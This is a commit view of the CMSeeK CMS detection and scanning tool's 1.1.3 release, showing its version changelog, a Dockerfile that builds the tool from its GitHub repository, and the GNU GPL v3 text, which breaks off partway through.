New upstream version 1.1.3
Sophie Brun
3 years ago
0 | Version 1.1.3 [25-07-2020] | |
1 | - Added new CMS: | |
2 | - Smartstore | |
3 | - Solusquare Commerce Cloud | |
4 | - Spree | |
5 | - Brightspot CMS | |
6 | - Amiro.CMS | |
7 | - Weebly | |
8 | - ekmPowershop | |
9 | - GoDaddy Website Builder | |
10 | - WHMCS | |
11 | - Zen Cart | |
12 | - OpenNemas CMS | |
13 | - IPO CMS | |
14 | - Version detection added for: | |
15 | - Amiro.CMS | |
16 | - GoDaddy Website Builder | |
17 | - Added WordPress Bruteforce via XML-RPC | |
18 | - improved logging for joomla scans | |
19 | - improved logging for WordPress deep scan | |
20 | - Switched to wpvulns.com for wordpress vulnerabilities | |
21 | - Added `--light-scan` argument | |
22 | - Added (`--only-cms`, `-o`) argument | |
23 | ||
24 | Version 1.1.2 [19-05-2019] | |
25 | - Added new CMS: | |
26 | - Proximis Omnichannel | |
27 | - Quick.Cart | |
28 | - RBS Change | |
29 | - Salesforce Commerce Cloud | |
30 | - Sazito | |
31 | - Shopatron | |
32 | - Umbraco | |
33 | - Shoper | |
34 | - Shopery | |
35 | - ShopFA | |
36 | - Shopify | |
37 | - Shoptet | |
38 | - Version detection added for: | |
39 | - Quick.Cart | |
40 | - Oracle ATG Web Commerce | |
41 | - RBS Change | |
42 | - Umbraco | |
43 | - ShopFA | |
44 | - Added `--batch` argument | |
45 | - Added `--ignore-cms` argument | |
46 | - Added `--strict-cms` argument | |
47 | - Added `--skip-scanned` argument | |
48 | - Identify if WordPress detection via source code was false positive | |
49 | - Fixed an issue where cms name and cms url would not be added in the result json | |
50 | ||
51 | Version 1.1.1 [01-02-2019] | |
52 | - Added new CMS: | |
53 | - Afosto | |
54 | - Afterbuy | |
55 | - Arastta | |
56 | - BigCommerce | |
57 | - Bigware | |
58 | - Bizweb | |
59 | - Clientexec | |
60 | - CloudCart | |
61 | - ColormeShop | |
62 | - Moodle | |
63 | - ORKIS Ajaris Websuite | |
64 | - Comandia | |
65 | - Commerce Server | |
66 | - Cosmoshop | |
67 | - CS Cart | |
68 | - CubeCart | |
69 | - Al Mubda | |
70 | - Dynamicweb | |
71 | - EC-CUBE | |
72 | - Elcodi | |
73 | - ePages | |
74 | - eZ Publish | |
75 | - Fortune3 | |
76 | - PrestaShop | |
77 | - BigTree CMS | |
78 | - Version detection added for: | |
79 | - Magento | |
80 | - Commerce Server | |
81 | - Dynamicweb | |
82 | - Refactored code for detecting cms | |
83 | - Added `--googlebot` option to use googlebot user agent | |
84 | - Added `--follow-redirect` and `--no-redirect` arguments | |
85 | ||
86 | Version 1.1.0 [28-08-2018] | |
87 | - Added new CMS: | |
88 | - Advanced Electron Forum | |
89 | - Arc Forum | |
90 | - AspNetForum | |
91 | - Burning Board | |
92 | - Beehive Forum | |
93 | - Discourse | |
94 | - Discuz! | |
95 | - Flarum | |
96 | - FluxBB | |
97 | - FUDforum | |
98 | - IPB Forum | |
99 | - JForum | |
100 | - MercuryBoard | |
101 | - miniBB | |
102 | - mvnForum | |
103 | - MyBB | |
104 | - mwForum | |
105 | - myUPB | |
106 | - NodeBB | |
107 | - NoNonsense Forum | |
108 | - Phorum | |
109 | - PunBB | |
110 | - SMF | |
111 | - UBB.threads | |
112 | - Vanilla | |
113 | - uKnowva | |
114 | - XenForo | |
115 | - XMB | |
116 | - YaBB | |
117 | - YAF | |
118 | - Yazd | |
119 | - Version detection added for: | |
120 | - Advanced Electron Forum | |
121 | - AspNetForum | |
122 | - Burning Board | |
123 | - Beehive Forum | |
124 | - Discourse | |
125 | - Discuz! | |
126 | - FUDforum | |
127 | - JForum | |
128 | - MercuryBoard | |
129 | - miniBB | |
130 | - mvnForum | |
131 | - MyBB | |
132 | - myUPB | |
133 | - NodeBB | |
134 | - PunBB | |
135 | - SMF | |
136 | - UBB.threads | |
137 | - Vanilla | |
138 | - uKnowva | |
139 | - XMB | |
140 | - YaBB | |
141 | - YAF | |
142 | - New detection methods added for: | |
143 | - phpwind | |
144 | - Fixed an issue with log (#28) | |
145 | ||
146 | Version 1.0.9 [21-08-2018] | |
147 | - Added new CMS: | |
148 | - PHP Nuke | |
149 | - FlexCMP | |
150 | - eZ Publish | |
151 | - ExpressionEngine | |
152 | - EPiServer | |
153 | - e107 | |
154 | - DNN Platform | |
155 | - phpBB | |
156 | - DEDE CMS | |
157 | - Danneo CMS | |
158 | - Craft CMS | |
159 | - CPG Dragonfly | |
160 | - Cotonti | |
161 | - Orchard CMS | |
162 | - ContentBox | |
163 | - Contentful | |
164 | - Contensis CMS | |
165 | - CMS CONTENIDO | |
166 | - Contao | |
167 | - Concrete5 CMS | |
168 | - Version detection added for: | |
169 | - FlexCMP | |
170 | - Danneo CMS | |
171 | - Contensis CMS | |
172 | - CMS CONTENIDO | |
173 | - Concrete5 CMS | |
174 | - CMSimple | |
175 | - BrowserCMS | |
176 | - Ignore certificate error (#20) | |
177 | - UA validation evasion added | |
178 | - UI Revamped | |
179 | ||
180 | Version 1.0.8 [14-08-2018] | |
181 | - Added new CMS: | |
182 | - SilverStripe | |
183 | - Silva CMS | |
184 | - Serendipity | |
185 | - SeamlessCMS | |
186 | - Rock RMS | |
187 | - Roadiz CMS | |
188 | - RiteCMS | |
189 | - RCMS | |
190 | - Quick.Cms | |
191 | - Pimcore | |
192 | - Percussion CMS | |
193 | - phpWind | |
194 | - phpCMS | |
195 | - PencilBlue | |
196 | - Ophal | |
197 | - Sitefinity | |
198 | - OpenText WSM | |
199 | - OpenCms | |
200 | - Odoo | |
201 | - Microsoft SharePoint | |
202 | - October CMS | |
203 | - Mura CMS | |
204 | - Moto CMS | |
205 | - Mono.net | |
206 | - MODX | |
207 | - Methode | |
208 | - Mambo | |
209 | - LiveStreet CMS | |
210 | - LEPTON CMS | |
211 | - HIPPO CMS | |
212 | - Kooboo CMS | |
213 | - Koken | |
214 | - IndexHibit | |
215 | - Webflow CMS | |
216 | - Jalios JCMS | |
217 | - ImpressPages CMS | |
218 | - Hotaru CMS | |
219 | - GravCMS | |
220 | - GetSimple CMS | |
221 | - Fork CMS | |
222 | - Version detection added for: | |
223 | - Serendipity | |
224 | - SeamlessCMS | |
225 | - Rock RMS | |
226 | - RiteCMS | |
227 | - Roadiz CMS | |
228 | - phpWind | |
229 | - Quick.Cms | |
230 | - Ophal | |
231 | - Sitefinity | |
232 | - OpenText WSM | |
233 | - OpenCms | |
234 | - Microsoft SharePoint | |
235 | - Mura CMS | |
236 | - Kooboo CMS | |
237 | - Koken | |
238 | - Jimdo | |
239 | - ImpressPages CMS | |
240 | - New browser validation bypass added | |
241 | ||
242 | Version 1.0.7 [07-08-2018] | |
243 | - Added new CMS: | |
244 | - TiddlyWiki | |
245 | - SULU | |
246 | - Subrion CMS | |
247 | - Squiz Matrix | |
248 | - Spin CMS | |
249 | - solodev | |
250 | - sNews | |
251 | - sitecore | |
252 | - SIMsite | |
253 | - Simplébo | |
254 | - Version detection added for: | |
255 | - sNews | |
256 | - TiddlyWiki | |
257 | - SULU | |
258 | - Subrion CMS | |
259 | - New detection method added for: | |
260 | - Textpattern CMS | |
261 | - WordPress DeepScan Updated: | |
262 | - added path disclosure scan | |
263 | - added theme zip check | |
264 | - added check for user registration | |
265 | - fixed some issues with directory | |
266 | - fixed bruteforce modules | |
267 | - fixed url handler function | |
268 | ||
269 | Version 1.0.6 [23-07-2018] | |
270 | - added new CMSs: | |
271 | - XOOPS | |
272 | - Wolf CMS | |
273 | - Wix.com | |
274 | - WebGUI | |
275 | - UMI.CMS | |
276 | - ushahidi | |
277 | - Tiki Wiki CMS Groupware | |
278 | - WebsiteBaker CMS | |
279 | - New detection methods added for: | |
280 | - typ03 | |
281 | - WordPress | |
282 | - Drupal | |
283 | - Joomla | |
284 | - Version detection added for | |
285 | - XpressEngine | |
286 | - WebGUI | |
287 | - UMI.CMS | |
288 | - added cms detection via robots.txt | |
289 | - CMS detection via generator meta tag improved | |
290 | - fixed all bruteforce modules (yet again) | |
291 | - brutefocer now adds username to the list of passwords to try [issue #14] | |
292 | - added (-l, --list) argument for scanning sites from file | |
293 | - Other minor fixes and tweaks | |
294 | ||
295 | Version 1.0.5 [19-07-2018] | |
296 | - version detection for drupal added | |
297 | - fixed '/' error in url | |
298 | - added a detection method for drupal | |
299 | - Core updated to make it smaller and faster | |
300 | - removed multiprocessing with multithreading now cmseek runs on almost all devices | |
301 | - other minor fixes | |
302 | ||
303 | Version 1.0.4 [17-07-2018] | |
304 | - added joomla deep scan and version detection | |
305 | - minor core update | |
306 | - removed some junk code from wordpress deepscan | |
307 | ||
308 | Version 1.0.3 [06-07-2018] | |
309 | - clear-result argument added | |
310 | - fixed all bruteforce modules | |
311 | ||
312 | Version 1.0.2 [06-07-2018] | |
313 | - WordPress passive theme detection added | |
314 | - WordPress passive plugins enumeration added | |
315 | - Added Verbose, url, random-agnet, user-agent, help arguments | |
316 | - Deep scan updated | |
317 | - Version detect updated | |
318 | - Minor code updates and bug fixes | |
319 | ||
320 | Version 1.0.1 [19-06-2018] | |
321 | - Added Update option | |
322 | - Added version switch | |
323 | - some minor updates | |
324 | ||
325 | Version 1.0.0 [15-06-2018] | |
326 | - Initial Beta release |
0 | FROM python:3-alpine | |
1 | ||
2 | LABEL name CMSeeK | |
3 | LABEL src "https://github.com/Tuhinshubhra/CMSeeK" | |
4 | LABEL creato Tuhinshubhra | |
5 | LABEL dockerfile_maintenance khast3x | |
6 | LABEL desc "CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 130 other CMSs." | |
7 | ||
8 | ||
9 | RUN apk add --no-cache git py3-pip && git clone https://github.com/Tuhinshubhra/CMSeeK | |
10 | ||
11 | WORKDIR CMSeeK | |
12 | RUN pip install -r requirements.txt | |
13 | ENTRYPOINT [ "python", "cmseek.py" ] |
0 | GNU GENERAL PUBLIC LICENSE | |
1 | Version 3, 29 June 2007 | |
2 | ||
3 | Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/> | |
4 | Everyone is permitted to copy and distribute verbatim copies | |
5 | of this license document, but changing it is not allowed. | |
6 | ||
7 | Preamble | |
8 | ||
9 | The GNU General Public License is a free, copyleft license for | |
10 | software and other kinds of works. | |
11 | ||
12 | The licenses for most software and other practical works are designed | |
13 | to take away your freedom to share and change the works. By contrast, | |
14 | the GNU General Public License is intended to guarantee your freedom to | |
15 | share and change all versions of a program--to make sure it remains free | |
16 | software for all its users. We, the Free Software Foundation, use the | |
17 | GNU General Public License for most of our software; it applies also to | |
18 | any other work released this way by its authors. You can apply it to | |
19 | your programs, too. | |
20 | ||
21 | When we speak of free software, we are referring to freedom, not | |
22 | price. Our General Public Licenses are designed to make sure that you | |
23 | have the freedom to distribute copies of free software (and charge for | |
24 | them if you wish), that you receive source code or can get it if you | |
25 | want it, that you can change the software or use pieces of it in new | |
26 | free programs, and that you know you can do these things. | |
27 | ||
28 | To protect your rights, we need to prevent others from denying you | |
29 | these rights or asking you to surrender the rights. Therefore, you have | |
30 | certain responsibilities if you distribute copies of the software, or if | |
31 | you modify it: responsibilities to respect the freedom of others. | |
32 | ||
33 | For example, if you distribute copies of such a program, whether | |
34 | gratis or for a fee, you must pass on to the recipients the same | |
35 | freedoms that you received. You must make sure that they, too, receive | |
36 | or can get the source code. And you must show them these terms so they | |
37 | know their rights. | |
38 | ||
39 | Developers that use the GNU GPL protect your rights with two steps: | |
40 | (1) assert copyright on the software, and (2) offer you this License | |
41 | giving you legal permission to copy, distribute and/or modify it. | |
42 | ||
43 | For the developers' and authors' protection, the GPL clearly explains | |
44 | that there is no warranty for this free software. For both users' and | |
45 | authors' sake, the GPL requires that modified versions be marked as | |
46 | changed, so that their problems will not be attributed erroneously to | |
47 | authors of previous versions. | |
48 | ||
49 | Some devices are designed to deny users access to install or run | |
50 | modified versions of the software inside them, although the manufacturer | |
51 | can do so. This is fundamentally incompatible with the aim of | |
52 | protecting users' freedom to change the software. The systematic | |
53 | pattern of such abuse occurs in the area of products for individuals to | |
54 | use, which is precisely where it is most unacceptable. Therefore, we | |
55 | have designed this version of the GPL to prohibit the practice for those | |
56 | products. If such problems arise substantially in other domains, we | |
57 | stand ready to extend this provision to those domains in future versions | |
58 | of the GPL, as needed to protect the freedom of users. | |
59 | ||
60 | Finally, every program is threatened constantly by software patents. | |
61 | States should not allow patents to restrict development and use of | |
62 | software on general-purpose computers, but in those that do, we wish to | |
63 | avoid the special danger that patents applied to a free program could | |
64 | make it effectively proprietary. To prevent this, the GPL assures that | |
65 | patents cannot be used to render the program non-free. | |
66 | ||
67 | The precise terms and conditions for copying, distribution and | |
68 | modification follow. | |
69 | ||
70 | TERMS AND CONDITIONS | |
71 | ||
72 | 0. Definitions. | |
73 | ||
74 | "This License" refers to version 3 of the GNU General Public License. | |
75 | ||
76 | "Copyright" also means copyright-like laws that apply to other kinds of | |
77 | works, such as semiconductor masks. | |
78 | ||
79 | "The Program" refers to any copyrightable work licensed under this | |
80 | License. Each licensee is addressed as "you". "Licensees" and | |
81 | "recipients" may be individuals or organizations. | |
82 | ||
83 | To "modify" a work means to copy from or adapt all or part of the work | |
84 | in a fashion requiring copyright permission, other than the making of an | |
85 | exact copy. The resulting work is called a "modified version" of the | |
86 | earlier work or a work "based on" the earlier work. | |
87 | ||
88 | A "covered work" means either the unmodified Program or a work based | |
89 | on the Program. | |
90 | ||
91 | To "propagate" a work means to do anything with it that, without | |
92 | permission, would make you directly or secondarily liable for | |
93 | infringement under applicable copyright law, except executing it on a | |
94 | computer or modifying a private copy. Propagation includes copying, | |
95 | distribution (with or without modification), making available to the | |
96 | public, and in some countries other activities as well. | |
97 | ||
98 | To "convey" a work means any kind of propagation that enables other | |
99 | parties to make or receive copies. Mere interaction with a user through | |
100 | a computer network, with no transfer of a copy, is not conveying. | |
101 | ||
102 | An interactive user interface displays "Appropriate Legal Notices" | |
103 | to the extent that it includes a convenient and prominently visible | |
104 | feature that (1) displays an appropriate copyright notice, and (2) | |
105 | tells the user that there is no warranty for the work (except to the | |
106 | extent that warranties are provided), that licensees may convey the | |
107 | work under this License, and how to view a copy of this License. If | |
108 | the interface presents a list of user commands or options, such as a | |
109 | menu, a prominent item in the list meets this criterion. | |
110 | ||
111 | 1. Source Code. | |
112 | ||
113 | The "source code" for a work means the preferred form of the work | |
114 | for making modifications to it. "Object code" means any non-source | |
115 | form of a work. | |
116 | ||
117 | A "Standard Interface" means an interface that either is an official | |
118 | standard defined by a recognized standards body, or, in the case of | |
119 | interfaces specified for a particular programming language, one that | |
120 | is widely used among developers working in that language. | |
121 | ||
122 | The "System Libraries" of an executable work include anything, other | |
123 | than the work as a whole, that (a) is included in the normal form of | |
124 | packaging a Major Component, but which is not part of that Major | |
125 | Component, and (b) serves only to enable use of the work with that | |
126 | Major Component, or to implement a Standard Interface for which an | |
127 | implementation is available to the public in source code form. A | |
128 | "Major Component", in this context, means a major essential component | |
129 | (kernel, window system, and so on) of the specific operating system | |
130 | (if any) on which the executable work runs, or a compiler used to | |
131 | produce the work, or an object code interpreter used to run it. | |
132 | ||
133 | The "Corresponding Source" for a work in object code form means all | |
134 | the source code needed to generate, install, and (for an executable | |
135 | work) run the object code and to modify the work, including scripts to | |
136 | control those activities. However, it does not include the work's | |
137 | System Libraries, or general-purpose tools or generally available free | |
138 | programs which are used unmodified in performing those activities but | |
139 | which are not part of the work. For example, Corresponding Source | |
140 | includes interface definition files associated with source files for | |
141 | the work, and the source code for shared libraries and dynamically | |
142 | linked subprograms that the work is specifically designed to require, | |
143 | such as by intimate data communication or control flow between those | |
144 | subprograms and other parts of the work. | |
145 | ||
146 | The Corresponding Source need not include anything that users | |
147 | can regenerate automatically from other parts of the Corresponding | |
148 | Source. | |
149 | ||
150 | The Corresponding Source for a work in source code form is that | |
151 | same work. | |
152 | ||
153 | 2. Basic Permissions. | |
154 | ||
155 | All rights granted under this License are granted for the term of | |
156 | copyright on the Program, and are irrevocable provided the stated | |
157 | conditions are met. This License explicitly affirms your unlimited | |
158 | permission to run the unmodified Program. The output from running a | |
159 | covered work is covered by this License only if the output, given its | |
160 | content, constitutes a covered work. This License acknowledges your | |
161 | rights of fair use or other equivalent, as provided by copyright law. | |
162 | ||
163 | You may make, run and propagate covered works that you do not | |
164 | convey, without conditions so long as your license otherwise remains | |
165 | in force. You may convey covered works to others for the sole purpose | |
166 | of having them make modifications exclusively for you, or provide you | |
167 | with facilities for running those works, provided that you comply with | |
168 | the terms of this License in conveying all material for which you do | |
169 | not control copyright. Those thus making or running the covered works | |
170 | for you must do so exclusively on your behalf, under your direction | |
171 | and control, on terms that prohibit them from making any copies of | |
172 | your copyrighted material outside their relationship with you. | |
173 | ||
174 | Conveying under any other circumstances is permitted solely under | |
175 | the conditions stated below. Sublicensing is not allowed; section 10 | |
176 | makes it unnecessary. | |
177 | ||
178 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. | |
179 | ||
180 | No covered work shall be deemed part of an effective technological | |
181 | measure under any applicable law fulfilling obligations under article | |
182 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or | |
183 | similar laws prohibiting or restricting circumvention of such | |
184 | measures. | |
185 | ||
186 | When you convey a covered work, you waive any legal power to forbid | |
187 | circumvention of technological measures to the extent such circumvention | |
188 | is effected by exercising rights under this License with respect to | |
189 | the covered work, and you disclaim any intention to limit operation or | |
190 | modification of the work as a means of enforcing, against the work's | |
191 | users, your or third parties' legal rights to forbid circumvention of | |
192 | technological measures. | |
193 | ||
194 | 4. Conveying Verbatim Copies. | |
195 | ||
196 | You may convey verbatim copies of the Program's source code as you | |
197 | receive it, in any medium, provided that you conspicuously and | |
198 | appropriately publish on each copy an appropriate copyright notice; | |
199 | keep intact all notices stating that this License and any | |
200 | non-permissive terms added in accord with section 7 apply to the code; | |
201 | keep intact all notices of the absence of any warranty; and give all | |
202 | recipients a copy of this License along with the Program. | |
203 | ||
204 | You may charge any price or no price for each copy that you convey, | |
205 | and you may offer support or warranty protection for a fee. | |
206 | ||
207 | 5. Conveying Modified Source Versions. | |
208 | ||
209 | You may convey a work based on the Program, or the modifications to | |
210 | produce it from the Program, in the form of source code under the | |
211 | terms of section 4, provided that you also meet all of these conditions: | |
212 | ||
213 | a) The work must carry prominent notices stating that you modified | |
214 | it, and giving a relevant date. | |
215 | ||
216 | b) The work must carry prominent notices stating that it is | |
217 | released under this License and any conditions added under section | |
218 | 7. This requirement modifies the requirement in section 4 to | |
219 | "keep intact all notices". | |
220 | ||
221 | c) You must license the entire work, as a whole, under this | |
222 | License to anyone who comes into possession of a copy. This | |
223 | License will therefore apply, along with any applicable section 7 | |
224 | additional terms, to the whole of the work, and all its parts, | |
225 | regardless of how they are packaged. This License gives no | |
226 | permission to license the work in any other way, but it does not | |
227 | invalidate such permission if you have separately received it. | |
228 | ||
229 | d) If the work has interactive user interfaces, each must display | |
230 | Appropriate Legal Notices; however, if the Program has interactive | |
231 | interfaces that do not display Appropriate Legal Notices, your | |
232 | work need not make them do so. | |
233 | ||
234 | A compilation of a covered work with other separate and independent | |
235 | works, which are not by their nature extensions of the covered work, | |
236 | and which are not combined with it such as to form a larger program, | |
237 | in or on a volume of a storage or distribution medium, is called an | |
238 | "aggregate" if the compilation and its resulting copyright are not | |
239 | used to limit the access or legal rights of the compilation's users | |
240 | beyond what the individual works permit. Inclusion of a covered work | |
241 | in an aggregate does not cause this License to apply to the other | |
242 | parts of the aggregate. | |
243 | ||
244 | 6. Conveying Non-Source Forms. | |
245 | ||
246 | You may convey a covered work in object code form under the terms | |
247 | of sections 4 and 5, provided that you also convey the | |
248 | machine-readable Corresponding Source under the terms of this License, | |
249 | in one of these ways: | |
250 | ||
251 | a) Convey the object code in, or embodied in, a physical product | |
252 | (including a physical distribution medium), accompanied by the | |
253 | Corresponding Source fixed on a durable physical medium | |
254 | customarily used for software interchange. | |
255 | ||
256 | b) Convey the object code in, or embodied in, a physical product | |
257 | (including a physical distribution medium), accompanied by a | |
258 | written offer, valid for at least three years and valid for as | |
259 | long as you offer spare parts or customer support for that product | |
260 | model, to give anyone who possesses the object code either (1) a | |
261 | copy of the Corresponding Source for all the software in the | |
262 | product that is covered by this License, on a durable physical | |
263 | medium customarily used for software interchange, for a price no | |
264 | more than your reasonable cost of physically performing this | |
265 | conveying of source, or (2) access to copy the | |
266 | Corresponding Source from a network server at no charge. | |
267 | ||
268 | c) Convey individual copies of the object code with a copy of the | |
269 | written offer to provide the Corresponding Source. This | |
270 | alternative is allowed only occasionally and noncommercially, and | |
271 | only if you received the object code with such an offer, in accord | |
272 | with subsection 6b. | |
273 | ||
274 | d) Convey the object code by offering access from a designated | |
275 | place (gratis or for a charge), and offer equivalent access to the | |
276 | Corresponding Source in the same way through the same place at no | |
277 | further charge. You need not require recipients to copy the | |
278 | Corresponding Source along with the object code. If the place to | |
279 | copy the object code is a network server, the Corresponding Source | |
280 | may be on a different server (operated by you or a third party) | |
281 | that supports equivalent copying facilities, provided you maintain | |
282 | clear directions next to the object code saying where to find the | |
283 | Corresponding Source. Regardless of what server hosts the | |
284 | Corresponding Source, you remain obligated to ensure that it is | |
285 | available for as long as needed to satisfy these requirements. | |
286 | ||
287 | e) Convey the object code using peer-to-peer transmission, provided | |
288 | you inform other peers where the object code and Corresponding | |
289 | Source of the work are being offered to the general public at no | |
290 | charge under subsection 6d. | |
291 | ||
292 | A separable portion of the object code, whose source code is excluded | |
293 | from the Corresponding Source as a System Library, need not be | |
294 | included in conveying the object code work. | |
295 | ||
296 | A "User Product" is either (1) a "consumer product", which means any | |
297 | tangible personal property which is normally used for personal, family, | |
298 | or household purposes, or (2) anything designed or sold for incorporation | |
299 | into a dwelling. In determining whether a product is a consumer product, | |
300 | doubtful cases shall be resolved in favor of coverage. For a particular | |
301 | product received by a particular user, "normally used" refers to a | |
302 | typical or common use of that class of product, regardless of the status | |
303 | of the particular user or of the way in which the particular user | |
304 | actually uses, or expects or is expected to use, the product. A product | |
305 | is a consumer product regardless of whether the product has substantial | |
306 | commercial, industrial or non-consumer uses, unless such uses represent | |
307 | the only significant mode of use of the product. | |
308 | ||
309 | "Installation Information" for a User Product means any methods, | |
310 | procedures, authorization keys, or other information required to install | |
311 | and execute modified versions of a covered work in that User Product from | |
312 | a modified version of its Corresponding Source. The information must | |
313 | suffice to ensure that the continued functioning of the modified object | |
314 | code is in no case prevented or interfered with solely because | |
315 | modification has been made. | |
316 | ||
317 | If you convey an object code work under this section in, or with, or | |
318 | specifically for use in, a User Product, and the conveying occurs as | |
319 | part of a transaction in which the right of possession and use of the | |
320 | User Product is transferred to the recipient in perpetuity or for a | |
321 | fixed term (regardless of how the transaction is characterized), the | |
322 | Corresponding Source conveyed under this section must be accompanied | |
323 | by the Installation Information. But this requirement does not apply | |
324 | if neither you nor any third party retains the ability to install | |
325 | modified object code on the User Product (for example, the work has | |
326 | been installed in ROM). | |
327 | ||
328 | The requirement to provide Installation Information does not include a | |
329 | requirement to continue to provide support service, warranty, or updates | |
330 | for a work that has been modified or installed by the recipient, or for | |
331 | the User Product in which it has been modified or installed. Access to a | |
332 | network may be denied when the modification itself materially and | |
333 | adversely affects the operation of the network or violates the rules and | |
334 | protocols for communication across the network. | |
335 | ||
336 | Corresponding Source conveyed, and Installation Information provided, | |
337 | in accord with this section must be in a format that is publicly | |
338 | documented (and with an implementation available to the public in | |
339 | source code form), and must require no special password or key for | |
340 | unpacking, reading or copying. | |
341 | ||
342 | 7. Additional Terms. | |
343 | ||
344 | "Additional permissions" are terms that supplement the terms of this | |
345 | License by making exceptions from one or more of its conditions. | |
346 | Additional permissions that are applicable to the entire Program shall | |
347 | be treated as though they were included in this License, to the extent | |
348 | that they are valid under applicable law. If additional permissions | |
349 | apply only to part of the Program, that part may be used separately | |
350 | under those permissions, but the entire Program remains governed by | |
351 | this License without regard to the additional permissions. | |
352 | ||
353 | When you convey a copy of a covered work, you may at your option | |
354 | remove any additional permissions from that copy, or from any part of | |
355 | it. (Additional permissions may be written to require their own | |
356 | removal in certain cases when you modify the work.) You may place | |
357 | additional permissions on material, added by you to a covered work, | |
358 | for which you have or can give appropriate copyright permission. | |
359 | ||
360 | Notwithstanding any other provision of this License, for material you | |
361 | add to a covered work, you may (if authorized by the copyright holders of | |
362 | that material) supplement the terms of this License with terms: | |
363 | ||
364 | a) Disclaiming warranty or limiting liability differently from the | |
365 | terms of sections 15 and 16 of this License; or | |
366 | ||
367 | b) Requiring preservation of specified reasonable legal notices or | |
368 | author attributions in that material or in the Appropriate Legal | |
369 | Notices displayed by works containing it; or | |
370 | ||
371 | c) Prohibiting misrepresentation of the origin of that material, or | |
372 | requiring that modified versions of such material be marked in | |
373 | reasonable ways as different from the original version; or | |
374 | ||
375 | d) Limiting the use for publicity purposes of names of licensors or | |
376 | authors of the material; or | |
377 | ||
378 | e) Declining to grant rights under trademark law for use of some | |
379 | trade names, trademarks, or service marks; or | |
380 | ||
381 | f) Requiring indemnification of licensors and authors of that | |
382 | material by anyone who conveys the material (or modified versions of | |
383 | it) with contractual assumptions of liability to the recipient, for | |
384 | any liability that these contractual assumptions directly impose on | |
385 | those licensors and authors. | |
386 | ||
387 | All other non-permissive additional terms are considered "further | |
388 | restrictions" within the meaning of section 10. If the Program as you | |
389 | received it, or any part of it, contains a notice stating that it is | |
390 | governed by this License along with a term that is a further | |
391 | restriction, you may remove that term. If a license document contains | |
392 | a further restriction but permits relicensing or conveying under this | |
393 | License, you may add to a covered work material governed by the terms | |
394 | of that license document, provided that the further restriction does | |
395 | not survive such relicensing or conveying. | |
396 | ||
397 | If you add terms to a covered work in accord with this section, you | |
398 | must place, in the relevant source files, a statement of the | |
399 | additional terms that apply to those files, or a notice indicating | |
400 | where to find the applicable terms. | |
401 | ||
402 | Additional terms, permissive or non-permissive, may be stated in the | |
403 | form of a separately written license, or stated as exceptions; | |
404 | the above requirements apply either way. | |
405 | ||
406 | 8. Termination. | |
407 | ||
408 | You may not propagate or modify a covered work except as expressly | |
409 | provided under this License. Any attempt otherwise to propagate or | |
410 | modify it is void, and will automatically terminate your rights under | |
411 | this License (including any patent licenses granted under the third | |
412 | paragraph of section 11). | |
413 | ||
414 | However, if you cease all violation of this License, then your | |
415 | license from a particular copyright holder is reinstated (a) | |
416 | provisionally, unless and until the copyright holder explicitly and | |
417 | finally terminates your license, and (b) permanently, if the copyright | |
418 | holder fails to notify you of the violation by some reasonable means | |
419 | prior to 60 days after the cessation. | |
420 | ||
421 | Moreover, your license from a particular copyright holder is | |
422 | reinstated permanently if the copyright holder notifies you of the | |
423 | violation by some reasonable means, this is the first time you have | |
424 | received notice of violation of this License (for any work) from that | |
425 | copyright holder, and you cure the violation prior to 30 days after | |
426 | your receipt of the notice. | |
427 | ||
428 | Termination of your rights under this section does not terminate the | |
429 | licenses of parties who have received copies or rights from you under | |
430 | this License. If your rights have been terminated and not permanently | |
431 | reinstated, you do not qualify to receive new licenses for the same | |
432 | material under section 10. | |
433 | ||
434 | 9. Acceptance Not Required for Having Copies. | |
435 | ||
436 | You are not required to accept this License in order to receive or | |
437 | run a copy of the Program. Ancillary propagation of a covered work | |
438 | occurring solely as a consequence of using peer-to-peer transmission | |
439 | to receive a copy likewise does not require acceptance. However, | |
440 | nothing other than this License grants you permission to propagate or | |
441 | modify any covered work. These actions infringe copyright if you do | |
442 | not accept this License. Therefore, by modifying or propagating a | |
443 | covered work, you indicate your acceptance of this License to do so. | |
444 | ||
445 | 10. Automatic Licensing of Downstream Recipients. | |
446 | ||
447 | Each time you convey a covered work, the recipient automatically | |
448 | receives a license from the original licensors, to run, modify and | |
449 | propagate that work, subject to this License. You are not responsible | |
450 | for enforcing compliance by third parties with this License. | |
451 | ||
452 | An "entity transaction" is a transaction transferring control of an | |
453 | organization, or substantially all assets of one, or subdividing an | |
454 | organization, or merging organizations. If propagation of a covered | |
455 | work results from an entity transaction, each party to that | |
456 | transaction who receives a copy of the work also receives whatever | |
457 | licenses to the work the party's predecessor in interest had or could | |
458 | give under the previous paragraph, plus a right to possession of the | |
459 | Corresponding Source of the work from the predecessor in interest, if | |
460 | the predecessor has it or can get it with reasonable efforts. | |
461 | ||
462 | You may not impose any further restrictions on the exercise of the | |
463 | rights granted or affirmed under this License. For example, you may | |
464 | not impose a license fee, royalty, or other charge for exercise of | |
465 | rights granted under this License, and you may not initiate litigation | |
466 | (including a cross-claim or counterclaim in a lawsuit) alleging that | |
467 | any patent claim is infringed by making, using, selling, offering for | |
468 | sale, or importing the Program or any portion of it. | |
469 | ||
470 | 11. Patents. | |
471 | ||
472 | A "contributor" is a copyright holder who authorizes use under this | |
473 | License of the Program or a work on which the Program is based. The | |
474 | work thus licensed is called the contributor's "contributor version". | |
475 | ||
476 | A contributor's "essential patent claims" are all patent claims | |
477 | owned or controlled by the contributor, whether already acquired or | |
478 | hereafter acquired, that would be infringed by some manner, permitted | |
479 | by this License, of making, using, or selling its contributor version, | |
480 | but do not include claims that would be infringed only as a | |
481 | consequence of further modification of the contributor version. For | |
482 | purposes of this definition, "control" includes the right to grant | |
483 | patent sublicenses in a manner consistent with the requirements of | |
484 | this License. | |
485 | ||
486 | Each contributor grants you a non-exclusive, worldwide, royalty-free | |
487 | patent license under the contributor's essential patent claims, to | |
488 | make, use, sell, offer for sale, import and otherwise run, modify and | |
489 | propagate the contents of its contributor version. | |
490 | ||
491 | In the following three paragraphs, a "patent license" is any express | |
492 | agreement or commitment, however denominated, not to enforce a patent | |
493 | (such as an express permission to practice a patent or covenant not to | |
494 | sue for patent infringement). To "grant" such a patent license to a | |
495 | party means to make such an agreement or commitment not to enforce a | |
496 | patent against the party. | |
497 | ||
498 | If you convey a covered work, knowingly relying on a patent license, | |
499 | and the Corresponding Source of the work is not available for anyone | |
